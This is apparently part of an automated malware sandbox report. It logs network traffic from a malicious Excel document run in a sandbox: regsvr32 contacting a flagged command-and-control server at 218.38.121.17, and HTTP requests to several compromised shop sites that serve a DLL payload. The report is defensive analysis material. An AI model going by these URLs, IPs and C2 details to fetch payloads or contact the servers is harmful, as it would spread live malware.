                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 163.172.115.127:80 -> 192.168.2.22:49173
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80

                      Networking

                      Source: C:\Windows\System32\regsvr32.exe | Network Connect: 218.38.121.17 443
                      Source: Traffic | Snort IDS: 2404328 ET CNC Feodo Tracker Reported CnC Server TCP group 15 192.168.2.22:49180 -> 218.38.121.17:443
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | DNS query: sat7ate.com is down
                      Source: Joe Sandbox View | ASN Name: OVHFR OVHFR
                      Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                      Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Connection: Keep-Alive | Cookie: YYbWjqBjoLrCcX=SBgr/e6aC1IUNvJELTGXliW8JuD542AergoyMYXNvjxNLDRTdQNm8AuaxOmABbvgfv+8UtrcYH0nm8JVpNZn+3TWEfhRm/dUCR1CZolc/XwWvPSYMtjPL0bLJaxTy+IA9NnB1Bf21+p/nLECZUQKbQ3KotZmlTPMe1nDx9AvFrGbWdBwLhSH+OSwBm0uKoYGqTZIZ3usbgBMW4QV4nRpmrxN3K2+2Yb5BRhEeUfSv5e+Y0wUi7HP20VKUTWvvTmy+2YpSlrLS8NjnvoUHc/35DqIYRXDWKWVd2LKfBks9VLO8aBSd9lbpYy/Ixl+Ba5lMMnTILw8p+KXMtCwpS9W | Host: 218.38.121.17
                      Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Connection: Keep-Alive | Cookie: BepnebNbbnhLwN=d2b7sFWgS9DsqV+ktIDEPfDYK+u4VvGDu6RH8sqyC93zoy+j0gBi669p4anprtQEM0FTQaa5CcQDsE2n3Jik1MwelLYMW0cB2ckzSva1GTO9Ozuc6BuVVWHKD0CdjeEPdE+oGqdZWNtAUHV9t6hIutCFWcQnGko8pFlEzh+24tzbK7usfHuWSo1g9glenYgi3haMAIuRx4H0rCms/1aWJHObgPJCMzJMZePW+6QsU2qZksYBpCGLUBB4No5nO9JG4fI9x4h7VheOpHD72h9Li3R3N4z9E+yOI9ADuJ2vMtr3yhVw | Host: 218.38.121.17
                      Source: Joe Sandbox View | IP Address: 188.165.79.151 188.165.79.151
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Tue, 15 Nov 2022 11:43:52 GMT | Content-Type: application/x-msdownload | Content-Length: 769024 | Connection: keep-alive | X-Powered-By: PHP/7.3.0 | Set-Cookie: 63737b78b11da=1668512632; expires=Tue, 15-Nov-2022 11:44:52 GMT; Max-Age=60; path=/ | Cache-Control: no-cache, must-revalidate | Pragma: no-cache | Last-Modified: Tue, 15 Nov 2022 11:43:52 GMT | Expires: Tue, 15 Nov 2022 11:43:52 GMT | Content-Disposition: attachment; filename="40hd04O0.dll" | Content-Transfer-Encoding: binary
                      Source: unknown | HTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49180 version: TLS 1.0
                      Source: unknown | HTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49181 version: TLS 1.0
                      Source: global traffic | HTTP traffic detected: GET /Adapter/moycMR/ HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: www.spinbalence.com | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /index.php?controller=404 HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: www.spinbalence.com | Connection: Keep-Alive | Cookie: PrestaShop-7318ab2db5e4a3c3a59fb8879ad22162=Nw04PzmYYXL6IgJsn1ERig61Z7mzgI5cdqQk7Ts1Z5oXp%2FAqcUL0r5BFPvLtErAiRnV0TG5b0npswANceXA1cwrQZJXojk9hvRnyRY37Ivk%3D000075
                      Source: global traffic | HTTP traffic detected: GET /Content/Afa1PcRuxh/ HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: www.3d-stickers.com | Connection: Keep-Alive | Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=9ybostxWPod7nP43PifVMefImKxeSKaZAdXmfdItKWNI2Ckr%2B1t%2BqGSwMBMouqmkFK0SD2XdZ7Cg5qtQQ9RwtmJfdpSnAaKPknzS3gL2v8c%3D000079
                      Source: global traffic | HTTP traffic detected: GET /page-non-trouvee HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: www.3d-stickers.com | Connection: Keep-Alive | Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=9ybostxWPod7nP43PifVMefImKxeSKaZAdXmfdItKWNolWp%2F7SQd8f90S8O%2FCwGohxkvf3iPluWhTbyznpM1hqQ6wpX78PX55d2aotWs5IA%3D000075
                      Source: global traffic | HTTP traffic detected: GET /Content/Afa1PcRuxh/ HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: www.3d-stickers.com | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /bsavxiv/axHQYKl/ HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: navylin.com | Connection: Keep-Alive
                      Source: unknown | Network traffic detected: IP country count 21
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49178
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49177
                      Source: unknown | Network traffic detected: HTTP traffic on port 49180 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49181 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49175
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49174
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49181
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49180
                      Source: unknown | Network traffic detected: HTTP traffic on port 49175 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49174 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49177 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49178 -> 443
